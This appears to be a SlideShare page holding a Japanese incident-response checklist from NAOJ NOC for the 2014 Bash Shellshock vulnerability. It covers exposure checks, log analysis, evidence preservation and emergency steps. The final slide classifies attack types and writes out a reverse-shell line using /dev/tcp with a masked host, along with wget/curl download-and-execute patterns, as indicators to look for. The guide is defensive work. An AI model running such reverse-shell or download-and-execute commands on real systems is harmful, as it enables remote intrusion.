SlideShare ist ein Scribd-Unternehmen logo

Bash 脆弱性祭から抜け出そう

Masafumi Oe
Masafumi Oe

CVE-2014-6271 shell shock 脆弱性をチェックするための手順書です。NAOJ NOC作成

Technologie
1 von 5
Downloaden Sie, um offline zu lesen
Bash 脆弱性祭から抜け出そう 0)bashが入ってない(/bin/sh=bashである場合あり、sh--version)なら不正アク セス可能性なし 1)Bashを実行するcgi/ pl/ shといったwebコードがなければ、不正アクセス可能 性なし 2)ある場合 • Cgi/ shが、bashを実行する場合、不正アクセス可能性あり • CentOS/RedHutのように/bin/sh= bash の場合は、shでも不正アクセス可能性あり • Perlは、system() やexec, `(バッククォート)`でシステムシェル(=bash or /bin/sh=bash)が起動する部分があるなら、不正アクセス可能性あり 例)ls–l * みたいなメタ文字 • 無論明示的に、bash(や/bin/sh)を実行したら、アウト • ここまでで、不正アクセス可能性ありの場合は次に進む。 2014/10/3 大江将史 NAOJ NOC / 1
Bash 脆弱性祭から抜け出せない (前提)bash脆弱性により、UserAgentやcookie 経由など、環境変数経由で「任意」のコー ドを実行できる。 • Cookieはアクセスログに残らないので、何をされたかがわからない。 3)2の問題CGI等がアクセスログにてアクセスされてなかったら、不正アクセス可能性なし • ただし、他の脆弱性が放置されていたなら、書き換えされてるかもしれませんので、グレーです。 4)3でアクセスログがある場合、不正アクセス可能性があり、解析必要 • UserAgnetの記録をみて、“不正アクセスの分類”から脅威を把握する • Cookie経由など“なにをしたか”記録が残らない場合もあるので、アクセス元IPアドレスを解析する。 • 他に当該IPから他コンテンツへのアクセスがないなど、通常の利用がない場合は、不正アクセス可能性あり • 実行されたコードが、suexecなど、権限昇格する場合は、[緊急対応]へ 5)不正アクセス可能性ありの場合 不正アクセスされたとしても焦って再起動とかしない。 サーバ解析チェックリストを実行、NOCへ連絡 2014/10/3 大江将史 NAOJ NOC / 2
サーバー解析チェックリスト 1. 全プロセス(ps)とnetstat–naを記録する 2. /tmp/var/tmpなど、apacheの稼働権限で書き込めるディレクトリをコピーするなど、保全する。 3. サーバーのユーザーに対して、注意喚起する。 ssh公開認証の秘密鍵を配置し、パスフレーズがない場合は、特に注意する。 4. Webサーバを一旦停止する 自動起動しないようにする 5. 不審なプロセスと通信のチェック Apache等の稼働権限で動作するプロセスを再度チェックする。 動作してたら、精査、killする前に、次のnetstatチェックをする Netstatで、tcp/udpセッションを確認し、不審な通信がないかどうかをチェックする。 IRCサーバへの通信、バックシェル用途のTCP listen、ESTABLISHEDなTCPセッションをチェック Suexecなど、実行権限の確認 権限がweb serverと異なる場合は、緊急 6. システムを再起動 5の項目を再チェック WEBサーバを再起動して、5の項目を再チェック 4のチェックに問題など発見がなければ、サービスを復旧させ、ユーザーへその旨通知する。 ただし、限りない白に近いグレーな状態であることを理解する。 2014/10/3 大江将史 NAOJ NOC / 3
[緊急対応] 権限昇格のshell実行された • 権限昇格により、パスワードや各ユーザーのファイルなどの奪取やサーバの改ざんされた 可能性がある。 • 初動対応 • NOCへ連絡 • 以下の要点をサーバのアカウントユーザーへ緊急連絡する。 • ホームディレクトリ下のファイルが流失した可能性があること • パスワードやSSHの秘密鍵が流出した可能性があること、パスワード変更、SSH公開鍵を廃棄すること • この間のアクセス中の入出力内容が流出した可能性があること • サーバ全体の正常性が担保できていないこと • 当該サーバと関連するサーバはすべて管理者を除いて、ロックアウトすること。 • 関連サーバのユーザーへも連絡すること。 • 対応 • 作業内容を詳細に逐次記録し、ここまでの経緯も可能な限り記録すること。 • サーバー解析チェックリスト4を実施し、可能な限りプロセスなどを記録・チェックすること。 • サーバを停止し、ディスクを保全すること。 • 関連サーバ上で同様の解析を開始すること。対応困難などなら、関連サーバを停止すること。 2014/10/3 大江将史 NAOJ NOC / 4
Bash 不正アクセスの分類 • プローブ活動(セーフ) • Ping • Echo • Bash –c id (以下は、脅威となります。) • リバースシェル • Sh–i> & /dev/tcp/****/12345 0>&1 • ダウンロード • wget/ curl/lwp-download • ダウンロード&実行(&消去) • /var/tmp等へwgetして、perlやshellを持ち込んで実行、ついでに消す • IRCへ接続(war等) 各コマンドのアプリケーションが実在するかどうかをチェックする。実在なければ、不正アクセス可能 性は低い。 2014/10/3 大江将史 NAOJ NOC / 5

Empfohlen

Python02
Python02Python02
Python02XMLProJ2014
 
msysgit1.8.0でプロンプトにブランチ名を表示させる
msysgit1.8.0でプロンプトにブランチ名を表示させるmsysgit1.8.0でプロンプトにブランチ名を表示させる
msysgit1.8.0でプロンプトにブランチ名を表示させるKenichi Yamada
 
Word pressのテーマは firephpでハックすれば 良かったのか
Word pressのテーマは firephpでハックすれば 良かったのかWord pressのテーマは firephpでハックすれば 良かったのか
Word pressのテーマは firephpでハックすれば 良かったのかHisateru Tanaka
 
Pukiwiki コメントスパム対策 / 電波時計で NTP
Pukiwiki コメントスパム対策 / 電波時計で NTPPukiwiki コメントスパム対策 / 電波時計で NTP
Pukiwiki コメントスパム対策 / 電波時計で NTPKenichiro MATOHARA
 
プログラミング作法
プログラミング作法プログラミング作法
プログラミング作法Kota Uchida
 
Rustのタスクモデルについて
RustのタスクモデルについてRustのタスクモデルについて
Rustのタスクモデルについてzigen
 
入門:Single / Two Rate Three Color Marker (srTCM / trTCM)
入門:Single / Two Rate Three Color Marker (srTCM / trTCM)入門:Single / Two Rate Three Color Marker (srTCM / trTCM)
入門:Single / Two Rate Three Color Marker (srTCM / trTCM)Kentaro Ebisawa
 
IPv6 /48 Filtering
IPv6 /48 FilteringIPv6 /48 Filtering
IPv6 /48 FilteringRIPE NCC
 

Empfohlen

Python02
Python02Python02
Python02XMLProJ2014
 
msysgit1.8.0でプロンプトにブランチ名を表示させる
msysgit1.8.0でプロンプトにブランチ名を表示させるmsysgit1.8.0でプロンプトにブランチ名を表示させる
msysgit1.8.0でプロンプトにブランチ名を表示させるKenichi Yamada
 
Word pressのテーマは firephpでハックすれば 良かったのか
Word pressのテーマは firephpでハックすれば 良かったのかWord pressのテーマは firephpでハックすれば 良かったのか
Word pressのテーマは firephpでハックすれば 良かったのかHisateru Tanaka
 
Pukiwiki コメントスパム対策 / 電波時計で NTP
Pukiwiki コメントスパム対策 / 電波時計で NTPPukiwiki コメントスパム対策 / 電波時計で NTP
Pukiwiki コメントスパム対策 / 電波時計で NTPKenichiro MATOHARA
 
プログラミング作法
プログラミング作法プログラミング作法
プログラミング作法Kota Uchida
 
Rustのタスクモデルについて
RustのタスクモデルについてRustのタスクモデルについて
Rustのタスクモデルについてzigen
 
入門:Single / Two Rate Three Color Marker (srTCM / trTCM)
入門:Single / Two Rate Three Color Marker (srTCM / trTCM)入門:Single / Two Rate Three Color Marker (srTCM / trTCM)
入門:Single / Two Rate Three Color Marker (srTCM / trTCM)Kentaro Ebisawa
 
IPv6 /48 Filtering
IPv6 /48 FilteringIPv6 /48 Filtering
IPv6 /48 FilteringRIPE NCC
 
Mplsj2013 100 gを使い切るnaoj sdn
Mplsj2013 100 gを使い切るnaoj sdnMplsj2013 100 gを使い切るnaoj sdn
Mplsj2013 100 gを使い切るnaoj sdnMasafumi Oe
 
Ip qo s functional requirements
Ip qo s functional requirementsIp qo s functional requirements
Ip qo s functional requirementswael-b1
 
Intro to Single / Two Rate Three Color Marker (srTCM / trTCM)
Intro to Single / Two Rate Three Color Marker (srTCM / trTCM)Intro to Single / Two Rate Three Color Marker (srTCM / trTCM)
Intro to Single / Two Rate Three Color Marker (srTCM / trTCM)Kentaro Ebisawa
 
201406ルーター開発イントロダクション
201406ルーター開発イントロダクション201406ルーター開発イントロダクション
201406ルーター開発イントロダクションMasafumi Oe
 
QoS
QoSQoS
QoSGopan Govindan
 
QoS (quality of service)
QoS (quality of service)QoS (quality of service)
QoS (quality of service)Sri Safrina
 
Quality of Service
Quality of ServiceQuality of Service
Quality of ServiceAbhishek Wadhwa
 
Shell shock事件が明らかにするあなたの組織における情報セキュリティ力
Shell shock事件が明らかにするあなたの組織における情報セキュリティ力Shell shock事件が明らかにするあなたの組織における情報セキュリティ力
Shell shock事件が明らかにするあなたの組織における情報セキュリティ力Masafumi Oe
 
How to install WWLAN card on Thinkpad X1 Carbon
How to install WWLAN card on Thinkpad X1 CarbonHow to install WWLAN card on Thinkpad X1 Carbon
How to install WWLAN card on Thinkpad X1 CarbonMasafumi Oe
 
ワイヤレス・ワイヤードにおける広帯域通信 2
ワイヤレス・ワイヤードにおける広帯域通信 2ワイヤレス・ワイヤードにおける広帯域通信 2
ワイヤレス・ワイヤードにおける広帯域通信 2Masafumi Oe
 
Overview of Satellite based Internet service and architecture in Japan
Overview of Satellite based Internet service and architecture in JapanOverview of Satellite based Internet service and architecture in Japan
Overview of Satellite based Internet service and architecture in JapanMasafumi Oe
 
Janog震災時におけるインターネットアクセスの役割
Janog震災時におけるインターネットアクセスの役割Janog震災時におけるインターネットアクセスの役割
Janog震災時におけるインターネットアクセスの役割Masafumi Oe
 
データセンターカンファレンス基調対談_ネットワーク帯域を使いまくる
データセンターカンファレンス基調対談_ネットワーク帯域を使いまくるデータセンターカンファレンス基調対談_ネットワーク帯域を使いまくる
データセンターカンファレンス基調対談_ネットワーク帯域を使いまくるMasafumi Oe
 
Interop 2013 ORC ULTRA200 Project
Interop 2013 ORC ULTRA200 Project Interop 2013 ORC ULTRA200 Project
Interop 2013 ORC ULTRA200 Project Masafumi Oe
 
The importance of connecting stability
The importance of connecting stabilityThe importance of connecting stability
The importance of connecting stabilityMasafumi Oe
 
Amazon SES を勉強してみる その12024/04/12の勉強会で発表されたものです。
Amazon SES を勉強してみる その12024/04/12の勉強会で発表されたものです。Amazon SES を勉強してみる その12024/04/12の勉強会で発表されたものです。
Amazon SES を勉強してみる その12024/04/12の勉強会で発表されたものです。iPride Co., Ltd.
 
Postman LT Fukuoka_Quick Prototype_By Daniel
Postman LT Fukuoka_Quick Prototype_By DanielPostman LT Fukuoka_Quick Prototype_By Daniel
Postman LT Fukuoka_Quick Prototype_By Danieldanielhu54
 
20240412_HCCJP での Windows Server 2025 Active Directory
20240412_HCCJP での Windows Server 2025 Active Directory20240412_HCCJP での Windows Server 2025 Active Directory
20240412_HCCJP での Windows Server 2025 Active Directoryosamut
 
新人研修のまとめ 2024/04/12の勉強会で発表されたものです。
新人研修のまとめ 2024/04/12の勉強会で発表されたものです。新人研修のまとめ 2024/04/12の勉強会で発表されたものです。
新人研修のまとめ 2024/04/12の勉強会で発表されたものです。iPride Co., Ltd.
 
PHP-Conference-Odawara-2024-04-000000000
PHP-Conference-Odawara-2024-04-000000000PHP-Conference-Odawara-2024-04-000000000
PHP-Conference-Odawara-2024-04-000000000Shota Ito
 
プレイマットのパターン生成支援ツールの評価
プレイマットのパターン生成支援ツールの評価プレイマットのパターン生成支援ツールの評価
プレイマットのパターン生成支援ツールの評価sugiuralab
 
IoT in the era of generative AI, Thanks IoT ALGYAN.pptx
IoT in the era of generative AI, Thanks IoT ALGYAN.pptxIoT in the era of generative AI, Thanks IoT ALGYAN.pptx
IoT in the era of generative AI, Thanks IoT ALGYAN.pptxAtomu Hidaka
 

Weitere ähnliche Inhalte

Andere mochten auch

Mplsj2013 100 gを使い切るnaoj sdn
Mplsj2013 100 gを使い切るnaoj sdnMplsj2013 100 gを使い切るnaoj sdn
Mplsj2013 100 gを使い切るnaoj sdnMasafumi Oe
 
Ip qo s functional requirements
Ip qo s functional requirementsIp qo s functional requirements
Ip qo s functional requirementswael-b1
 
Intro to Single / Two Rate Three Color Marker (srTCM / trTCM)
Intro to Single / Two Rate Three Color Marker (srTCM / trTCM)Intro to Single / Two Rate Three Color Marker (srTCM / trTCM)
Intro to Single / Two Rate Three Color Marker (srTCM / trTCM)Kentaro Ebisawa
 
201406ルーター開発イントロダクション
201406ルーター開発イントロダクション201406ルーター開発イントロダクション
201406ルーター開発イントロダクションMasafumi Oe
 
QoS (quality of service)
QoS (quality of service)QoS (quality of service)
QoS (quality of service)Sri Safrina
 

Andere mochten auch (7)

Mplsj2013 100 gを使い切るnaoj sdn
Mplsj2013 100 gを使い切るnaoj sdnMplsj2013 100 gを使い切るnaoj sdn
Mplsj2013 100 gを使い切るnaoj sdn
 
Ip qo s functional requirements
Ip qo s functional requirementsIp qo s functional requirements
Ip qo s functional requirements
 
Intro to Single / Two Rate Three Color Marker (srTCM / trTCM)
Intro to Single / Two Rate Three Color Marker (srTCM / trTCM)Intro to Single / Two Rate Three Color Marker (srTCM / trTCM)
Intro to Single / Two Rate Three Color Marker (srTCM / trTCM)
 
201406ルーター開発イントロダクション
201406ルーター開発イントロダクション201406ルーター開発イントロダクション
201406ルーター開発イントロダクション
 
QoS
QoSQoS
QoS
 
QoS (quality of service)
QoS (quality of service)QoS (quality of service)
QoS (quality of service)
 
Quality of Service
Quality of ServiceQuality of Service
Quality of Service
 

Mehr von Masafumi Oe

Shell shock事件が明らかにするあなたの組織における情報セキュリティ力
Shell shock事件が明らかにするあなたの組織における情報セキュリティ力Shell shock事件が明らかにするあなたの組織における情報セキュリティ力
Shell shock事件が明らかにするあなたの組織における情報セキュリティ力Masafumi Oe
 
How to install WWLAN card on Thinkpad X1 Carbon
How to install WWLAN card on Thinkpad X1 CarbonHow to install WWLAN card on Thinkpad X1 Carbon
How to install WWLAN card on Thinkpad X1 CarbonMasafumi Oe
 
ワイヤレス・ワイヤードにおける広帯域通信 2
ワイヤレス・ワイヤードにおける広帯域通信 2ワイヤレス・ワイヤードにおける広帯域通信 2
ワイヤレス・ワイヤードにおける広帯域通信 2Masafumi Oe
 
Overview of Satellite based Internet service and architecture in Japan
Overview of Satellite based Internet service and architecture in JapanOverview of Satellite based Internet service and architecture in Japan
Overview of Satellite based Internet service and architecture in JapanMasafumi Oe
 
Janog震災時におけるインターネットアクセスの役割
Janog震災時におけるインターネットアクセスの役割Janog震災時におけるインターネットアクセスの役割
Janog震災時におけるインターネットアクセスの役割Masafumi Oe
 
データセンターカンファレンス基調対談_ネットワーク帯域を使いまくる
データセンターカンファレンス基調対談_ネットワーク帯域を使いまくるデータセンターカンファレンス基調対談_ネットワーク帯域を使いまくる
データセンターカンファレンス基調対談_ネットワーク帯域を使いまくるMasafumi Oe
 
Interop 2013 ORC ULTRA200 Project
Interop 2013 ORC ULTRA200 Project Interop 2013 ORC ULTRA200 Project
Interop 2013 ORC ULTRA200 Project Masafumi Oe
 
The importance of connecting stability
The importance of connecting stabilityThe importance of connecting stability
The importance of connecting stabilityMasafumi Oe
 

Mehr von Masafumi Oe (8)

Shell shock事件が明らかにするあなたの組織における情報セキュリティ力
Shell shock事件が明らかにするあなたの組織における情報セキュリティ力Shell shock事件が明らかにするあなたの組織における情報セキュリティ力
Shell shock事件が明らかにするあなたの組織における情報セキュリティ力
 
How to install WWLAN card on Thinkpad X1 Carbon
How to install WWLAN card on Thinkpad X1 CarbonHow to install WWLAN card on Thinkpad X1 Carbon
How to install WWLAN card on Thinkpad X1 Carbon
 
ワイヤレス・ワイヤードにおける広帯域通信 2
ワイヤレス・ワイヤードにおける広帯域通信 2ワイヤレス・ワイヤードにおける広帯域通信 2
ワイヤレス・ワイヤードにおける広帯域通信 2
 
Overview of Satellite based Internet service and architecture in Japan
Overview of Satellite based Internet service and architecture in JapanOverview of Satellite based Internet service and architecture in Japan
Overview of Satellite based Internet service and architecture in Japan
 
Janog震災時におけるインターネットアクセスの役割
Janog震災時におけるインターネットアクセスの役割Janog震災時におけるインターネットアクセスの役割
Janog震災時におけるインターネットアクセスの役割
 
データセンターカンファレンス基調対談_ネットワーク帯域を使いまくる
データセンターカンファレンス基調対談_ネットワーク帯域を使いまくるデータセンターカンファレンス基調対談_ネットワーク帯域を使いまくる
データセンターカンファレンス基調対談_ネットワーク帯域を使いまくる
 
Interop 2013 ORC ULTRA200 Project
Interop 2013 ORC ULTRA200 Project Interop 2013 ORC ULTRA200 Project
Interop 2013 ORC ULTRA200 Project
 
The importance of connecting stability
The importance of connecting stabilityThe importance of connecting stability
The importance of connecting stability
 

Kürzlich hochgeladen

Amazon SES を勉強してみる その12024/04/12の勉強会で発表されたものです。
Amazon SES を勉強してみる その12024/04/12の勉強会で発表されたものです。Amazon SES を勉強してみる その12024/04/12の勉強会で発表されたものです。
Amazon SES を勉強してみる その12024/04/12の勉強会で発表されたものです。iPride Co., Ltd.
 
Postman LT Fukuoka_Quick Prototype_By Daniel
Postman LT Fukuoka_Quick Prototype_By DanielPostman LT Fukuoka_Quick Prototype_By Daniel
Postman LT Fukuoka_Quick Prototype_By Danieldanielhu54
 
20240412_HCCJP での Windows Server 2025 Active Directory
20240412_HCCJP での Windows Server 2025 Active Directory20240412_HCCJP での Windows Server 2025 Active Directory
20240412_HCCJP での Windows Server 2025 Active Directoryosamut
 
新人研修のまとめ 2024/04/12の勉強会で発表されたものです。
新人研修のまとめ 2024/04/12の勉強会で発表されたものです。新人研修のまとめ 2024/04/12の勉強会で発表されたものです。
新人研修のまとめ 2024/04/12の勉強会で発表されたものです。iPride Co., Ltd.
 
PHP-Conference-Odawara-2024-04-000000000
PHP-Conference-Odawara-2024-04-000000000PHP-Conference-Odawara-2024-04-000000000
PHP-Conference-Odawara-2024-04-000000000Shota Ito
 
プレイマットのパターン生成支援ツールの評価
プレイマットのパターン生成支援ツールの評価プレイマットのパターン生成支援ツールの評価
プレイマットのパターン生成支援ツールの評価sugiuralab
 
IoT in the era of generative AI, Thanks IoT ALGYAN.pptx
IoT in the era of generative AI, Thanks IoT ALGYAN.pptxIoT in the era of generative AI, Thanks IoT ALGYAN.pptx
IoT in the era of generative AI, Thanks IoT ALGYAN.pptxAtomu Hidaka
 
プレイマットのパターン生成支援ツール
プレイマットのパターン生成支援ツールプレイマットのパターン生成支援ツール
プレイマットのパターン生成支援ツールsugiuralab
 

Kürzlich hochgeladen (8)

Amazon SES を勉強してみる その12024/04/12の勉強会で発表されたものです。
Amazon SES を勉強してみる その12024/04/12の勉強会で発表されたものです。Amazon SES を勉強してみる その12024/04/12の勉強会で発表されたものです。
Amazon SES を勉強してみる その12024/04/12の勉強会で発表されたものです。
 
Postman LT Fukuoka_Quick Prototype_By Daniel
Postman LT Fukuoka_Quick Prototype_By DanielPostman LT Fukuoka_Quick Prototype_By Daniel
Postman LT Fukuoka_Quick Prototype_By Daniel
 
20240412_HCCJP での Windows Server 2025 Active Directory
20240412_HCCJP での Windows Server 2025 Active Directory20240412_HCCJP での Windows Server 2025 Active Directory
20240412_HCCJP での Windows Server 2025 Active Directory
 
新人研修のまとめ 2024/04/12の勉強会で発表されたものです。
新人研修のまとめ 2024/04/12の勉強会で発表されたものです。新人研修のまとめ 2024/04/12の勉強会で発表されたものです。
新人研修のまとめ 2024/04/12の勉強会で発表されたものです。
 
PHP-Conference-Odawara-2024-04-000000000
PHP-Conference-Odawara-2024-04-000000000PHP-Conference-Odawara-2024-04-000000000
PHP-Conference-Odawara-2024-04-000000000
 
プレイマットのパターン生成支援ツールの評価
プレイマットのパターン生成支援ツールの評価プレイマットのパターン生成支援ツールの評価
プレイマットのパターン生成支援ツールの評価
 
IoT in the era of generative AI, Thanks IoT ALGYAN.pptx
IoT in the era of generative AI, Thanks IoT ALGYAN.pptxIoT in the era of generative AI, Thanks IoT ALGYAN.pptx
IoT in the era of generative AI, Thanks IoT ALGYAN.pptx
 
プレイマットのパターン生成支援ツール
プレイマットのパターン生成支援ツールプレイマットのパターン生成支援ツール
プレイマットのパターン生成支援ツール
 

Bash 脆弱性祭から抜け出そう

  • 1. Bash 脆弱性祭から抜け出そう 0)bashが入ってない(/bin/sh=bashである場合あり、sh--version)なら不正アク セス可能性なし 1)Bashを実行するcgi/ pl/ shといったwebコードがなければ、不正アクセス可能 性なし 2)ある場合 • Cgi/ shが、bashを実行する場合、不正アクセス可能性あり • CentOS/RedHutのように/bin/sh= bash の場合は、shでも不正アクセス可能性あり • Perlは、system() やexec, `(バッククォート)`でシステムシェル(=bash or /bin/sh=bash)が起動する部分があるなら、不正アクセス可能性あり 例)ls–l * みたいなメタ文字 • 無論明示的に、bash(や/bin/sh)を実行したら、アウト • ここまでで、不正アクセス可能性ありの場合は次に進む。 2014/10/3 大江将史 NAOJ NOC / 1
  • 2. Bash 脆弱性祭から抜け出せない (前提)bash脆弱性により、UserAgentやcookie 経由など、環境変数経由で「任意」のコー ドを実行できる。 • Cookieはアクセスログに残らないので、何をされたかがわからない。 3)2の問題CGI等がアクセスログにてアクセスされてなかったら、不正アクセス可能性なし • ただし、他の脆弱性が放置されていたなら、書き換えされてるかもしれませんので、グレーです。 4)3でアクセスログがある場合、不正アクセス可能性があり、解析必要 • UserAgnetの記録をみて、“不正アクセスの分類”から脅威を把握する • Cookie経由など“なにをしたか”記録が残らない場合もあるので、アクセス元IPアドレスを解析する。 • 他に当該IPから他コンテンツへのアクセスがないなど、通常の利用がない場合は、不正アクセス可能性あり • 実行されたコードが、suexecなど、権限昇格する場合は、[緊急対応]へ 5)不正アクセス可能性ありの場合 不正アクセスされたとしても焦って再起動とかしない。 サーバ解析チェックリストを実行、NOCへ連絡 2014/10/3 大江将史 NAOJ NOC / 2
  • 3. サーバー解析チェックリスト 1. 全プロセス(ps)とnetstat–naを記録する 2. /tmp/var/tmpなど、apacheの稼働権限で書き込めるディレクトリをコピーするなど、保全する。 3. サーバーのユーザーに対して、注意喚起する。 ssh公開認証の秘密鍵を配置し、パスフレーズがない場合は、特に注意する。 4. Webサーバを一旦停止する 自動起動しないようにする 5. 不審なプロセスと通信のチェック Apache等の稼働権限で動作するプロセスを再度チェックする。 動作してたら、精査、killする前に、次のnetstatチェックをする Netstatで、tcp/udpセッションを確認し、不審な通信がないかどうかをチェックする。 IRCサーバへの通信、バックシェル用途のTCP listen、ESTABLISHEDなTCPセッションをチェック Suexecなど、実行権限の確認 権限がweb serverと異なる場合は、緊急 6. システムを再起動 5の項目を再チェック WEBサーバを再起動して、5の項目を再チェック 4のチェックに問題など発見がなければ、サービスを復旧させ、ユーザーへその旨通知する。 ただし、限りない白に近いグレーな状態であることを理解する。 2014/10/3 大江将史 NAOJ NOC / 3
  • 4. [緊急対応] 権限昇格のshell実行された • 権限昇格により、パスワードや各ユーザーのファイルなどの奪取やサーバの改ざんされた 可能性がある。 • 初動対応 • NOCへ連絡 • 以下の要点をサーバのアカウントユーザーへ緊急連絡する。 • ホームディレクトリ下のファイルが流失した可能性があること • パスワードやSSHの秘密鍵が流出した可能性があること、パスワード変更、SSH公開鍵を廃棄すること • この間のアクセス中の入出力内容が流出した可能性があること • サーバ全体の正常性が担保できていないこと • 当該サーバと関連するサーバはすべて管理者を除いて、ロックアウトすること。 • 関連サーバのユーザーへも連絡すること。 • 対応 • 作業内容を詳細に逐次記録し、ここまでの経緯も可能な限り記録すること。 • サーバー解析チェックリスト4を実施し、可能な限りプロセスなどを記録・チェックすること。 • サーバを停止し、ディスクを保全すること。 • 関連サーバ上で同様の解析を開始すること。対応困難などなら、関連サーバを停止すること。 2014/10/3 大江将史 NAOJ NOC / 4
  • 5. Bash 不正アクセスの分類 • プローブ活動(セーフ) • Ping • Echo • Bash –c id (以下は、脅威となります。) • リバースシェル • Sh–i> & /dev/tcp/****/12345 0>&1 • ダウンロード • wget/ curl/lwp-download • ダウンロード&実行(&消去) • /var/tmp等へwgetして、perlやshellを持ち込んで実行、ついでに消す • IRCへ接続(war等) 各コマンドのアプリケーションが実在するかどうかをチェックする。実在なければ、不正アクセス可能 性は低い。 2014/10/3 大江将史 NAOJ NOC / 5